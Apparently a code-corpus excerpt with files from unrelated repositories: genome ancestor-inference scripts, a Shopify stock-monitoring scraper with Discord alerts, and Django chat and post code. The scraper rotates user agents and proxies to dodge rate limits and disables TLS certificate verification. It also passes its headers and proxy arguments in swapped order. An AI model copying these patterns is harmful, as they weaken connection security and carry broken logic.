new_block = '-' + block + '_' + str(block_objects[block])
block_objects[block] += 1
else:
block = i
if block not in block_objects.keys():
block_objects[block] = 1
new_block = block + '_' + str(block_objects[block])
block_objects[block] += 1
else:
new_block = block + '_' + str(block_objects[block])
block_objects[block] += 1
new_block_order.append(new_block)
last = ''
start = ''
for i in range(len(new_block_order)):
if i == 0:
if chr_type == 's':
if new_block_order[i].startswith('-'):
block = new_block_order[i][1:].split('_')[0]
copy_number = new_block_order[i][1:].split('_')[1]
adjacency_list.append(['$', block + 'b' + '@' + copy_number])
last = block + 'a' + '@' + copy_number
else:
block = new_block_order[i].split('_')[0]
copy_number = new_block_order[i].split('_')[1]
adjacency_list.append(['$', block + 'a' + '@' + copy_number])
last = block + 'b' + '@' + copy_number
else:
if new_block_order[i].startswith('-'):
block = new_block_order[i][1:].split('_')[0]
copy_number = new_block_order[i][1:].split('_')[1]
last = block + 'a' + '@' + copy_number
start = block + 'b' + '@' + copy_number
else:
block = new_block_order[i].split('_')[0]
copy_number = new_block_order[i].split('_')[1]
last = block + 'b' + '@' + copy_number
start = block + 'a' + '@' + copy_number
else:
if new_block_order[i].startswith('-'):
block = new_block_order[i][1:].split('_')[0]
copy_number = new_block_order[i][1:].split('_')[1]
adjacency_list.append([last, block + 'b' + '@' + copy_number])
last = block + 'a' + '@' + copy_number
else:
block = new_block_order[i].split('_')[0]
copy_number = new_block_order[i].split('_')[1]
adjacency_list.append([last, block + 'a' + '@' + copy_number])
last = block + 'b' + '@' + copy_number
if chr_type == 's':
adjacency_list.append([last, '$'])
else:
adjacency_list.append([last, start])
relabel_block_order.append([chr_type] + new_block_order)
return adjacency_list
def __build_assumed_matrix(self,adjacency_list):
endpoint_list = []
for i in adjacency_list:
for j in i:
if j not in endpoint_list:
endpoint_list.append(j)
endpoint_list = sorted(endpoint_list)
adjacency_matrix = {}
for i in endpoint_list:
adjacency_matrix[i] = {}
for j in endpoint_list:
adjacency_matrix[i][j] = 0
for i in adjacency_list:
adjacency_matrix[i[0]][i[1]] += 1
adjacency_matrix[i[1]][i[0]] += 1
adjacency_matrix = pd.DataFrame(adjacency_matrix)
adjacency_matrix = np.asarray(adjacency_matrix)
compress_adjacency_matrix = []
for i in range(len(adjacency_matrix)):
for j in range(len(adjacency_matrix[i])):
if round(adjacency_matrix[i][j]) != 0:
for k in range(adjacency_matrix[i][j]):
adjacency = [endpoint_list[i], endpoint_list[j]]
adjacency = sorted(adjacency)
if adjacency[0] == endpoint_list[i] and adjacency[1] == endpoint_list[j]:
if i == 0 and j == 0:
compress_adjacency_matrix.append([i, j, 0, 0, adjacency])
if i == 0 and j != 0:
compress_adjacency_matrix.append([i, j - 1, 0, 1, adjacency])
if i != 0 and j == 0:
compress_adjacency_matrix.append([i - 1, j, 1, 0, adjacency])
if i != 0 and j != 0:
compress_adjacency_matrix.append([i - 1, j - 1, 1, 1, adjacency])
if adjacency[0] == endpoint_list[j] and adjacency[1] == endpoint_list[i]:
if i == 0 and j == 0:
compress_adjacency_matrix.append([j, i, 0, 0, adjacency])
if i == 0 and j != 0:
compress_adjacency_matrix.append([j - 1, i, 1, 0, adjacency])
if i != 0 and j == 0:
compress_adjacency_matrix.append([j, i - 1, 0, 1, adjacency])
if i != 0 and j != 0:
compress_adjacency_matrix.append([j - 1, i - 1, 1, 1, adjacency])
return compress_adjacency_matrix, endpoint_list
```
#### File: IAGS_version1.0/models/GMPmodel.py
```python
from util.transformToAdjacency import transformToAdjacency
from inferringAncestorGenomeStructure.GMP import GMP
def GMPmodel(species_file_list, outdir, ancestor_name):
"""
GMP model takes into some species block sequence files
and transforms block sequence into block adjacencies.
IAGS uses GMP integer programming formulations
based on these block adjacencies to get ancestral block adjacencies
and then directly transforms to block sequence.
:param species_file_list: input species block sequence file list.
:param outdir: output directory
:param ancestor_name: ancestor name
"""
adj_file = outdir + ancestor_name + '.adj'
# transform to adjacencies
transformToAdjacency(species_file_list, adj_file)
output_matrix_file = outdir + ancestor_name + '.matrix.xls'
# GMP integer programming
gmp = GMP(adj_file,
target_copy_number=1)
gmp.optimization()
adjacency_matrix = gmp.ancestor_adjacency_matrix()
adjacency_matrix.output(output_matrix_file)
# block sequence
adjacency_matrix.assemble()
adjacency_matrix.out_assembly(outdir + ancestor_name + '.block', remove_bar=False)
```
#### File: IAGS_version1.0/run_script/run_MultiGMP.py
```python
import sys
import os
curPath = os.path.abspath(os.path.dirname(__file__))
rootPath = os.path.split(curPath)[0]
sys.path.append(rootPath)
import argparse
from models.MultiGMPmodel import MultiCopyGMPmodel
def main():
"""
Inferring ancestor species with MultiGMP model
"""
parser = argparse.ArgumentParser(description="IAGS MultiGMP")
parser.add_argument("-c", "--config_file")
args = parser.parse_args()
config_file = args.config_file
species_block_filelist = []
ancestor_name = ''
guided_species_for_matching = ''
ancestor_target_copy_number = ''
outdir = ''
with open(config_file,'r') as cf:
while True:
line = cf.readline()[:-1]
if not line:
break
if line.startswith('Species:'):
while True:
line = cf.readline()[:-1]
if line.startswith('End'):
break
species_block_filelist.append(line)
elif line.startswith('GuidedSpecies:'):
line = cf.readline()[:-1]
guided_species_for_matching = line
elif line.startswith('Outdir:'):
line = cf.readline()[:-1]
outdir = line
elif line.startswith('AncestorName:'):
line = cf.readline()[:-1]
ancestor_name = line
elif line.startswith('AncestorCopyNumber:'):
line = cf.readline()[:-1]
ancestor_target_copy_number = int(line)
else:
print('Error')
return
MultiCopyGMPmodel(species_block_filelist, outdir,
guided_species_for_matching, ancestor_name,
ancestor_target_copy_number)
if __name__ == '__main__':
main()
```
#### File: IAGS_version1.0/scenarios/Papaver.py
```python
from models.MultiGMPmodel import MultiCopyGMPmodel
from models.MultiGGHPmodel import MultiCopyGGHPmodel
from models.GGHPmodel import GGHPmodel
from util.calculatedCRBrateAndEstimationAccuracy import calculatedCRBrateAndEstimationAccuracy
"""
Inferring ancestor species for Papaver species.
Ancestor 3: Multi-copy GGHP model, result in outdutdata/Papaver/Ancestor3
Ancestor 1: GGHP model, result in outdutdata/Papaver/Ancestor1
Ancestor 2: Multi-copy GMP model, Ancestor1 should be doubled,result in outdutdata/Papaver/Ancestor2
"""
def doubled(infile,outfile):
"""
Used for doubled species block sequence.
:param infile: block sequence file
:param outfile: block sequence file
"""
outfile = open(outfile,'w')
sequence = []
with open(infile,'r') as f:
while True:
line = f.readline()
if not line:
break
sequence.append(line)
for i in sequence:
outfile.write(i)
for i in sequence:
outfile.write(i)
path = 'D:/InferAncestorGenome/realData'
workdir = path + '/IAGS_version1.0/inputdata/Papaver/'
"""
Inferring ancestor species for Papaver species.
Ancestor 3 using Multi-copy GGHP model
"""
dup_child_file = workdir + 'Psetigerum.final.block'
outgroup_file = workdir + 'Psomniferum.final.block'
outAncestor3dir = path + '/IAGS_version1.0/outputdata/Papaver/Ancestor3/'
dup_copy_number = 4
out_copy_number = 2
ancestor_target_copy_number = 2
ancestor_name = 'Ancestor3'
MultiCopyGGHPmodel(dup_child_file, outgroup_file, outAncestor3dir,
ancestor_name, dup_copy_number, out_copy_number,
ancestor_target_copy_number)
# Evaluation
matching_target_file = workdir + 'Psomniferum.final.block'
matching_target_copy_number = out_copy_number
matching_target_name = 'P.somniferum'
speciesAndCopyList = [
[workdir + 'Psetigerum.final.block',dup_copy_number,'P.setigerum'],
[workdir + 'Psomniferum.final.block',out_copy_number,'P.somniferum']
]
model_type = 'MultiCopyGGHP'
calculatedCRBrateAndEstimationAccuracy(matching_target_file, matching_target_copy_number, matching_target_name,
speciesAndCopyList, outAncestor3dir, model_type)
"""
Inferring ancestor species for Papaver species.
Ancestor 1 using GGHP model
"""
dup_child_file = workdir + 'Psomniferum.final.block'
outgroup_file = workdir + 'Prhoeas.final.block'
outAncestor1dir = path + '/IAGS_version1.0/outputdata/Papaver/Ancestor1/'
dup_copy_number = 2
out_copy_number = 1
ancestor_name = 'Ancestor1'
GGHPmodel(dup_child_file=dup_child_file,
outgroup_file=outgroup_file,
outdir=outAncestor1dir,
ancestor_name=ancestor_name,
dup_copy_number=dup_copy_number,
out_copy_number=out_copy_number)
# Evaluation
matching_target_file = workdir + 'Prhoeas.final.block'
matching_target_copy_number = out_copy_number
matching_target_name = 'P.rhoeas'
ancestor_copy_number = 1
speciesAndCopyList = [
[workdir + 'Psomniferum.final.block',dup_copy_number,'P.somniferum'],
[workdir + 'Prhoeas.final.block',out_copy_number,'P.rhoeas']
]
model_type = 'GGHP'
calculatedCRBrateAndEstimationAccuracy(matching_target_file, matching_target_copy_number, matching_target_name,
speciesAndCopyList, outAncestor1dir, model_type)
"""
Inferring ancestor species for Papaver species.
Ancestor 2 using Multi-copy GMP model
"""
doubled(outAncestor1dir + 'Ancestor1.block',outAncestor1dir + 'Ancestor1.doubled.block')
species_file_list = [workdir + 'Psomniferum.final.block',
outAncestor3dir + 'Ancestor3.block',
outAncestor1dir + 'Ancestor1.doubled.block']
guided_species_for_matching = workdir + 'Psomniferum.final.block'
outAncestor2dir = path + '/IAGS_version1.0/outputdata/Papaver/Ancestor2/'
ancestor_target_copy_number = 2
ancestor_name = 'Ancestor2'
MultiCopyGMPmodel(species_file_list, outAncestor2dir, guided_species_for_matching,
ancestor_name, ancestor_target_copy_number)
# Evaluation
matching_target_file = workdir + 'Psomniferum.final.block'
matching_target_copy_number = ancestor_target_copy_number
matching_target_name = 'P.somniferum'
speciesAndCopyList = [
[workdir + 'Psomniferum.final.block',ancestor_target_copy_number,'P.somniferum'],
[outAncestor3dir + 'Ancestor3.block',ancestor_target_copy_number,'Ancestor3'],
[outAncestor1dir + 'Ancestor1.doubled.block',ancestor_target_copy_number,'Ancestor1.doubled']
]
model_type = 'MultiCopyGMP'
calculatedCRBrateAndEstimationAccuracy(matching_target_file, matching_target_copy_number, matching_target_name,
speciesAndCopyList, outAncestor2dir, model_type)
```
#### File: simulations/CRBs/MultiGGHPsimulations.py
```python
import pandas as pd
import copy
import numpy as np
import random
def outSequence(sequence,outfile):
outfile = open(outfile,'w')
for i in sequence:
for j in i:
outfile.write(j+' ')
outfile.write('\n')
outfile.close()
def sequence2adjacency(sequence):
adjacency = []
for i in sequence:
block = i[0]
if block.startswith('-'):
adjacency.append(['$',block[1:] + 'b'])
start = block[1:] + 'a'
else:
adjacency.append(['$', block + 'a'])
start = block + 'b'
for j in range(len(i)-1):
block = i[j+1]
if block.startswith('-'):
adjacency.append([start, block[1:] + 'b'])
start = block[1:] + 'a'
else:
adjacency.append([start, block + 'a'])
start = block + 'b'
adjacency.append([start,'$'])
return adjacency
def reverse(item):
if item[-1] == 'a':
return item[:-1] + 'b'
else:
return item[:-1] + 'a'
def assemble(adjacency_list):
# assemble adjacencies to sequence
matrix_items = []
for i in adjacency_list:
for j in i:
if j not in matrix_items:
matrix_items.append(j)
matrix_items = sorted(matrix_items)
adjacency_matrix = {}
for i in matrix_items:
adjacency_matrix[i] = {}
for j in matrix_items:
adjacency_matrix[i][j] = 0
for i in adjacency_list:
adjacency_matrix[i[0]][i[1]] = 1
adjacency_matrix[i[1]][i[0]] = 1
adjacency_matrix = pd.DataFrame(adjacency_matrix)
index = adjacency_matrix.index.tolist()
columns = adjacency_matrix.columns.tolist()
np_adjacency_matrix = np.asarray(adjacency_matrix)
adjacencies = {}
for i in range(len(index)):
for j in range(len(index)):
if int(np_adjacency_matrix[i][j]) == 1:
if '$' == index[i] or '$' == index[j]:
continue
pair = sorted([index[i], index[j]])
key = pair[0] + '@' + pair[1]
if key not in adjacencies.keys():
adjacencies[key] = 1
else:
adjacencies[key] += 1
adjs = {}
for i in adjacencies.keys():
itemset = i.split('@')
if itemset[0] not in adjs.keys():
adjs[itemset[0]] = itemset[1]
if itemset[1] not in adjs.keys():
adjs[itemset[1]] = itemset[0]
startpoint = []
for j in range(len(columns)):
if np_adjacency_matrix[0][j] == 1:
startpoint.append(columns[j])
markerstartpoint = []
chr = []
for i in startpoint:
if i not in markerstartpoint:
path = []
if i[-1] == 'a':
path.append(i[:-1])
else:
path.append('-' + i[:-1])
start = reverse(i)
if start in startpoint:
markerstartpoint.append(start)
chr.append(path)
else:
while True:
next = adjs[start]
if next[-1] == 'a':
path.append(next[:-1])
else:
path.append('-' + next[:-1])
start = reverse(next)
if start in startpoint:
markerstartpoint.append(start)
break
chr.append(path)
vector = []
for i in chr:
for j in i:
if j.startswith('-'):
vector.append(j[1:])
else:
vector.append(j)
cyclepoint = []
for i in adjs.keys():
if i[:-1] not in vector:
cyclepoint.append(i)
cyclechr = []
markercycle = []
for i in cyclepoint:
if i not in markercycle:
startpoint = i
cycle = []
markercycle.append(i)
start = i
while True:
next = adjs[start]
if next[-1] == 'a':
cycle.append(next[:-1])
else:
cycle.append('-' + next[:-1])
markercycle.append(start)
markercycle.append(next)
start = reverse(next)
if start == startpoint:
break
cyclechr.append(cycle)
return chr,cyclechr
def changeAdj(adj_list):
change = copy.deepcopy(adj_list)
endpoints = []
for j in change:
for k in j:
endpoints.append(k)
random.shuffle(endpoints)
change_part = []
for j in range(int(len(endpoints) / 2)):
change_part.append([endpoints[j * 2], endpoints[2 * j + 1]])
return change_part
def readSequence(file):
chr = []
with open(file,'r') as rf:
while True:
line = rf.readline()[:-2]
if not line:
break
itemset = line.split(' ')
header = itemset[0]
new_itemset = [header]
for i in itemset[1:]:
item = i.split('_')
new_itemset.append(item[0])
chr.append(new_itemset)
return chr
def buildSimulatedMultiGGHP_CRBs(adjacencises, save_final_species_adjacencies, change_adjacency_number, divergence_level, current_level):
random.shuffle(adjacencises)
sp1 = copy.deepcopy(adjacencises)
sp1_change = copy.deepcopy(sp1[:change_adjacency_number])
sp1_change = changeAdj(sp1_change)
sp1_unchange = copy.deepcopy(sp1[change_adjacency_number:])
new_sp1 = sp1_change + sp1_unchange
save_final_species_adjacencies.append(new_sp1)
random.shuffle(adjacencises)
sp2 = copy.deepcopy(adjacencises)
sp2_change = copy.deepcopy(sp2[:change_adjacency_number])
sp2_change = changeAdj(sp2_change)
sp2_unchange = copy.deepcopy(sp2[change_adjacency_number:])
new_sp2 = sp2_change + sp2_unchange
save_final_species_adjacencies.append(new_sp2)
# duplication
sp2_dup = []
for i in new_sp2:
if i[0] == '$':
newendpoint1 = '$'
newendpoint2 = '$'
else:
newendpoint1 = i[0][:-1]+'_1'+i[0][-1]
newendpoint2 = i[0][:-1] + '_2' + i[0][-1]
if i[1] == '$':
newendpoint3 = '$'
newendpoint4 = '$'
else:
newendpoint3 = i[1][:-1]+'_1'+i[1][-1]
newendpoint4 = i[1][:-1] + '_2' + i[1][-1]
sp2_dup.append([newendpoint1,newendpoint3])
sp2_dup.append([newendpoint2, newendpoint4])
random.shuffle(sp2_dup)
sp3 = copy.deepcopy(sp2_dup)
sp3_change = copy.deepcopy(sp3[:change_adjacency_number * 2])
sp3_change = changeAdj(sp3_change)
sp3_unchange = copy.deepcopy(sp3[change_adjacency_number * 2:])
new_sp3 = sp3_change + sp3_unchange
if current_level == divergence_level:
save_final_species_adjacencies.append(new_sp3)
else:
save_final_species_adjacencies.append(new_sp3)
buildSimulatedMultiGGHP_CRBs(new_sp3, save_final_species_adjacencies, change_adjacency_number * 2,
divergence_level, current_level + 1)
# simulate with some changed adjacencies in each species
def simulateMultiGGHP_CRBs(outdir, change_adjacency_number):
ancestor_sequence_file = outdir + 'ancestor.sequence'
chromosome_number = 5
block_number = 50
ancestor_sequence = []
one_chromosome = int(block_number / chromosome_number)
block = 100
for i in range(chromosome_number):
sequence = []
for j in range(one_chromosome):
if block % 2 == 0:
sequence.append('-' + str(block)+'_1')
else:
sequence.append(str(block)+'_1')
block += 1
ancestor_sequence.append(sequence)
# outSequence(ancestor_sequence, ancestor_sequence_file)
ancestor_adjacency = sequence2adjacency(ancestor_sequence)
random.shuffle(ancestor_adjacency)
print(len(ancestor_adjacency))
divergence_level = 1
save_final_species_adjacencies = []
buildSimulatedMultiGGHP_CRBs(ancestor_adjacency, save_final_species_adjacencies, change_adjacency_number, divergence_level, current_level=0)
species_count = 1
for i in save_final_species_adjacencies:
print('-----')
outfile = outdir + 'species.sequence.' + str(species_count)
outfile = open(outfile,'w')
filter_tel2tel = []
for j in i:
# filter ($,$)
if j[0] == '$' and j[1] == '$':
continue
else:
filter_tel2tel.append([j[0], j[1]])
chrs,cycles = assemble(filter_tel2tel)
print('chr')
for j in chrs:
print(j)
outfile.write('s ')
for k in j:
outfile.write(k+' ')
outfile.write('\n')
print('cycle')
for j in cycles:
print(j)
outfile.write('c ')
min_index = -1
min_value = 1000000
for k in range(len(j)):
if j[k].startswith('-'):
item = j[k][1:].split('_')
block = int(item[0])
else:
item = j[k].split('_')
block = int(item[0])
if block < min_value:
min_index = k
min_value = block
if j[min_index].startswith('-'):
half1 = j[min_index + 1:]
half2 = j[:min_index + 1]
new_string = half1 + half2
else:
half1 = j[min_index:]
half2 = j[:min_index]
new_string = half1 + half2
for k in new_string:
outfile.write(k+' ')
outfile.write('\n')
outfile.close()
species_count += 1
``` |
{
"source": "869903437/Sneaker-Monitors",
"score": 2
} |
#### File: Sneaker-Monitors/Shopify/ShopifyMonitor.py
```python
import requests as rq
import json
import time
from datetime import datetime
import urllib3
import logging
import dotenv
from random_user_agent.user_agent import UserAgent
from random_user_agent.params import SoftwareName, HardwareType
logging.basicConfig(filename='Shopifylog.log', filemode='a', format='%(asctime)s - %(name)s - %(message)s',
level=logging.DEBUG)
software_names = [SoftwareName.CHROME.value]
hardware_type = [HardwareType.MOBILE__PHONE]
user_agent_rotator = UserAgent(software_names=software_names, hardware_type=hardware_type)
CONFIG = dotenv.dotenv_values()
INSTOCK = []
def check_url(url):
"""
Checks whether the supplied URL is valid
:return: Boolean - True if valid
"""
return 'products.json' in url
def scrape_site(url, headers, proxy):
"""
Scrapes the specified Shopify site and adds items to array
:return: None
"""
items = []
s = rq.Session()
page = 1
while True:
try:
html = s.get(url + f'?page={page}&limit=250', headers=headers, proxies=proxy, verify=False, timeout=20)
output = json.loads(html.text)['products']
if output == []:
break
else:
for product in output:
product_item = [
{'title': product['title'], 'image': product['images'][0]['src'], 'handle': product['handle'],
'variants': product['variants']}]
items.append(product_item)
logging.info(msg='Successfully scraped site')
page += 1
except Exception as e:
logging.error(e)
break
time.sleep(float(CONFIG['DELAY']))
s.close()
return items
def checker(handle):
"""
Determines whether the product status has changed
"""
for item in INSTOCK:
if item == handle:
return True
return False
def discord_webhook(product_item):
"""
Sends a Discord webhook notification to the specified webhook URL
:param product_item: An array containing the product name, product sizes in-stock ans the thumbnail URL
:return: None
"""
description = ''
if product_item[0] == 'initial':
description = "Thank you for using Yasser's Sneaker Monitors. This message is to let you know that " \
"everything is working fine! You can find more monitoring solutions at " \
"https://github.com/yasserqureshi1/Sneaker-Monitors "
else:
fields = []
for size in product_item[1][0]:
fields.append({'name': size, 'value': 'Available', 'inline': True})
link = CONFIG['URL'].replace('.json', '/') + product_item[3]
data = {}
data["username"] = CONFIG['USERNAME']
data["avatar_url"] = CONFIG['AVATAR_URL']
data["embeds"] = []
embed = {}
if product_item[0] != 'initial':
embed["title"] = product_item[0]
embed['url'] = link
embed["thumbnail"] = {'url': product_item[2]}
embed["fields"] = fields
else:
embed["description"] = description
embed["color"] = int(CONFIG['COLOUR'])
embed["footer"] = {'text': 'Made by <NAME>'}
embed["timestamp"] = str(datetime.utcnow())
data["embeds"].append(embed)
result = rq.post(CONFIG['WEBHOOK'], data=json.dumps(data), headers={"Content-Type": "application/json"})
try:
result.raise_for_status()
except rq.exceptions.HTTPError as err:
logging.error(err)
else:
print("Payload delivered successfully, code {}.".format(result.status_code))
logging.info(msg="Payload delivered successfully, code {}.".format(result.status_code))
def remove_duplicates(mylist):
"""
Removes duplicate values from a list
:param mylist: list
:return: list
"""
return list(set(mylist))
def comparitor(product, start):
product_item = [product[0]['title'], [], product[0]['image'], product[0]['handle']]
available_sizes = []
for size in product[0]['variants']:
if size['available']:
available_sizes.append(size['title'])
if available_sizes:
if checker(product[0]['handle']):
pass
else:
INSTOCK.append(product[0]['handle'])
product_item[1].append(available_sizes)
else:
if checker(product[0]['handle']):
INSTOCK.remove(product[0]['handle'])
if not product_item[1]:
pass
else:
if start == 0:
print(product_item)
discord_webhook(product_item)
logging.info(msg='Successfully sent Discord notification')
def monitor():
"""
Initiates the monitor
:return: None
"""
print('STARTING MONITOR')
logging.info(msg='Successfully started monitor')
if not check_url(CONFIG['URL']):
print('Store URL not in correct format. Please ensure that it is a path pointing to a /products.json file')
logging.error(msg='Store URL formatting incorrect for: ' + str(CONFIG['URL']))
return
discord_webhook(['initial'])
start = 1
proxy_no = 0
proxy_list = CONFIG['PROXY'].split('%')
proxy = {} if proxy_list[0] == "" else {"http": f"http://{proxy_list[proxy_no]}"}
headers = {'User-Agent': user_agent_rotator.get_random_user_agent()}
keywords = CONFIG['KEYWORDS'].split('%')
while True:
try:
items = scrape_site(CONFIG['URL'], proxy, headers)
for product in items:
check = False
if keywords == "":
comparitor(product, start)
else:
for key in keywords:
if key.lower() in product[0]['title'].lower():
check = True
break
if check:
comparitor(product, start)
except Exception as e:
print(e)
logging.error(e)
headers = {'User-Agent': user_agent_rotator.get_random_user_agent()}
if proxy != {}:
proxy_no = 0 if proxy_no == (len(proxy_list) - 1) else proxy_no + 1
proxy = {"http": f"http://{proxy_list[proxy_no]}"}
start = 0
time.sleep(float(CONFIG['DELAY']))
if __name__ == '__main__':
urllib3.disable_warnings()
monitor()
``` |
{
"source": "86Ilya/net640kb",
"score": 3
} |
#### File: apps/chat/consumers.py
```python
import json
from channels.generic.websocket import AsyncWebsocketConsumer, AsyncJsonWebsocketConsumer
from Net640.apps.chat.models import Message
from Net640.errors import NotEnoughSpace
class ChatConsumer(AsyncWebsocketConsumer):
"""
Class-consumer, which will accept WebSocket connections and
process ws messages.
"""
async def connect(self):
self.user = self.scope['user']
if not self.user.is_authenticated:
raise Exception("user is not authenticated")
self.room_name = self.scope['url_route']['kwargs']['room_name']
self.room_group_name = 'chat_{}'.format(self.room_name)
# Join room group
await self.channel_layer.group_add(
self.room_group_name,
self.channel_name
)
await self.accept()
async def disconnect(self, close_code):
# Leave room group
await self.channel_layer.group_discard(
self.room_group_name,
self.channel_name
)
# Receive message from WebSocket
async def receive(self, text_data):
text_data_json = json.loads(text_data)
content = text_data_json['message']
response = None
# Save message to database
chat_message = Message(author=self.user, chat_room=self.room_name, content=content)
try:
chat_message.save()
response = {
'content': chat_message.content,
'timestamp': chat_message.formatted_timestamp,
'author': chat_message.author.username,
'message_id': chat_message.id,
}
except NotEnoughSpace:
# TODO send notificatin via update_flow
return
else:
# Send message to room group
await self.channel_layer.group_send(self.room_group_name, {'type': 'chat_message', 'message': response})
# Receive message from room group
async def chat_message(self, event):
message = event['message']
# Send message to WebSocket
await self.send(text_data=json.dumps({
'message': message,
}))
class EventConsumer(AsyncJsonWebsocketConsumer):
async def connect(self):
self.room_name = str(self.scope['user'].id) + '_update_flow'
await self.channel_layer.group_add(
self.room_name,
self.channel_name
)
await self.accept()
async def disconnect(self, close_code):
# TODO print -> logging
await self.channel_layer.group_discard(
self.room_name,
self.channel_name
)
async def receive_json(self, content, **kwargs):
await self.send_json(content)
async def update_flow(self, event):
await self.send_json(
{
'type': 'update_flow',
'message': event['message']
}
)
```
#### File: apps/updateflow/consumers.py
```python
from channels.generic.websocket import AsyncJsonWebsocketConsumer
from Net640.apps.updateflow.helpers import get_updateflow_room_name
class EventConsumer(AsyncJsonWebsocketConsumer):
async def connect(self):
self.user = self.scope['user']
if not self.user.is_authenticated:
raise Exception("user is not authenticated")
self.room_name = get_updateflow_room_name(self.scope['user'].id)
await self.channel_layer.group_add(
self.room_name,
self.channel_name
)
await self.accept()
async def disconnect(self, close_code):
await self.channel_layer.group_discard(
self.room_name,
self.channel_name
)
async def receive_json(self, content, **kwargs):
await self.send_json(content)
async def update_flow(self, event):
await self.send_json(
{
'type': 'update_flow',
'message': event['message']
}
)
```
#### File: apps/user_posts/mixin.py
```python
from django.urls import reverse
from Net640.settings import FRONTEND_DATE_FORMAT
class AsDictMessageMixin:
"""
Mixin for representing user messages(post, comments) as dictionaries
"""
def as_dict(self, executor):
return {'content': self.content,
'user_has_like': self.has_like(executor),
'is_owner': self.user == executor,
'rating': round(self.get_rating(), 1),
'author': self.user.username,
'author_page': reverse('friends:user_view', kwargs={'user_id': self.user.id}),
'date': self.date.strftime(FRONTEND_DATE_FORMAT),
'id': self.id,
'author_thumbnail_url': self.user.get_thumbnail_url(), }
```
#### File: apps/user_posts/models.py
```python
import os
import logging
from django.db import models
from django.conf import settings
from django.utils import timezone
from Net640.apps.images.models import user_directory_path
from Net640.mixin import LikesMixin
from Net640.apps.user_posts.mixin import AsDictMessageMixin
from Net640.apps.user_posts.exceptions import PostException
class Post(LikesMixin, AsDictMessageMixin, models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
content = models.TextField()
date = models.DateTimeField(default=timezone.now, blank=True)
image = models.ImageField(upload_to=user_directory_path)
image_size = models.IntegerField(default=0)
likes = models.ManyToManyField(settings.AUTH_USER_MODEL, default=None, related_name="post_likes")
class Meta:
ordering = ["-date"]
app_label = 'user_posts'
def get_image_url(self):
if self.image:
return self.image.url
def get_size(self):
""" calculate post size """
# TODO Currently, this method calculates the size approximately. Need to calculate likes.
try:
post_size = 0
post_size += len(str(self.id))
post_size += len(str(self.user.id))
post_size += len(self.content)
post_size += len(str(self.user_id))
post_size += len(str(self.date))
if self.image:
post_size += self.image.size
except Exception as error:
raise PostException("Got error when calculating post size {}".format(error))
return post_size
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
try:
post_size = self.get_size()
if post_size:
# send increment info
self.user.msg_upd_page_size(post_size)
except PostException as error:
logging.error(error)
def delete(self, *args, **kwargs):
try:
post_size = self.get_size()
if post_size:
# send decrement info
self.user.msg_upd_page_size(-post_size)
except PostException as error:
logging.error(error)
finally:
super().delete(*args, **kwargs)
if self.image:
os.remove(self.image.path)
def as_dict(self, executor):
result = super().as_dict(executor)
result.update({'comments': [comment.as_dict(executor) for comment in Comment.objects.filter(post=self)],
'image_url': self.get_image_url()})
return result
class Comment(LikesMixin, AsDictMessageMixin, models.Model):
"""
Comment model for user post
"""
content = models.TextField()
post = models.ForeignKey(Post, on_delete=models.CASCADE)
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
date = models.DateTimeField(default=timezone.now)
likes = models.ManyToManyField(settings.AUTH_USER_MODEL, default=None, related_name="comment_likes")
class Meta:
ordering = ['-date']
app_label = 'user_posts'
```
#### File: user_posts/tests/test_forms.py
```python
from uuid import uuid1
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import TestCase
from Net640.apps.user_posts.forms import PostForm
from Net640.apps.user_profile.models import User
from Net640.testing.helpers import create_test_image
class TestUserPostForm(TestCase):
def setUp(self):
random_name = str(uuid1())
self.user = User(username=random_name, email=random_name + '@m.ru')
self.user.save()
def test_create_correct_post_by_form(self):
user_post_form_data = {'content': 'test content'}
user_post_form = PostForm(user_post_form_data, user=self.user)
self.assertTrue(user_post_form.is_valid())
def test_create_correct_post_by_form_with_image(self):
img_file, content_type = create_test_image()
img_dict = {'image': SimpleUploadedFile('myimage.bmp', img_file.read(), content_type)}
user_post_form_data = {'content': 'test content'}
user_post_form = PostForm(user_post_form_data, img_dict, user=self.user)
self.assertTrue(user_post_form.is_valid())
def test_create_incorrect_anonymous_post_by_form(self):
user_post_form_data = {'content': 'test content'}
user_post_form = PostForm(user_post_form_data)
self.assertFalse(user_post_form.is_valid())
self.assertEqual(user_post_form.errors['__all__'][0], 'Anonymous posts are not allowed')
def test_create_incorrect_oversized_post_by_form(self):
img_file, content_type = create_test_image(1000)
img_dict = {'image': SimpleUploadedFile('myimage.bmp', img_file.read(), content_type)}
user_post_form_data = {'content': 'test content'}
user_post_form = PostForm(user_post_form_data, img_dict, user=self.user)
self.assertFalse(user_post_form.is_valid())
self.assertEqual(user_post_form.errors['__all__'][0], 'Not enough space!')
```
#### File: apps/user_profile/forms.py
```python
from django import forms
from django.contrib.auth.hashers import make_password
from django.contrib.auth.forms import PasswordResetForm
from django.core.validators import RegexValidator
from django.core.exceptions import ObjectDoesNotExist
from django.utils.translation import ugettext_lazy as _
from Net640.apps.user_profile.models import User
from Net640.settings import MAX_PAGE_SIZE, DATE_FORMAT
from Net640.errors import ERR_EXCEED_LIMIT
username_validator = RegexValidator(r'^[\w\d_\-]+$',
"Username should contain only letters, digits, underscores, and dashes")
class CleanPasswordMixin:
def _clean_password(self, cleaned_data):
password = cleaned_data['password']
password_again = cleaned_data['password_again']
validation_errors = list()
if len(password) == 0 and len(password_again) == 0:
return cleaned_data, validation_errors
if password != password_again:
validation_errors.append(forms.ValidationError("Passwords mismatch"))
elif len(password) < 8:
validation_errors.append(forms.ValidationError("Password length must be at least 8 symbols"))
return cleaned_data, validation_errors
class UserForm(CleanPasswordMixin, forms.ModelForm):
username = forms.CharField(widget=forms.TextInput, max_length=120, min_length=3, validators=[username_validator])
email = forms.EmailField(widget=forms.EmailInput)
password = forms.CharField(widget=forms.PasswordInput)
password_again = forms.CharField(widget=forms.PasswordInput)
avatar = forms.ImageField(widget=forms.FileInput)
class Meta:
model = User
fields = ('username', 'email', 'password', 'password_again', 'avatar')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['avatar'].required = False
self.fields['avatar'].label = 'Upload Avatar:'
self.fields['avatar'].widget.attrs.update({
'class': 'form-control-file'
})
if self.fields.get('username', None):
self.fields['username'].widget.attrs.update({
'placeholder': 'Username', 'class': 'form-control mb-3'
})
self.fields['username'].help_text = ''
self.fields['username'].label = ''
self.fields['email'].widget.attrs.update({
'placeholder': 'Email', 'class': 'form-control mb-3'
})
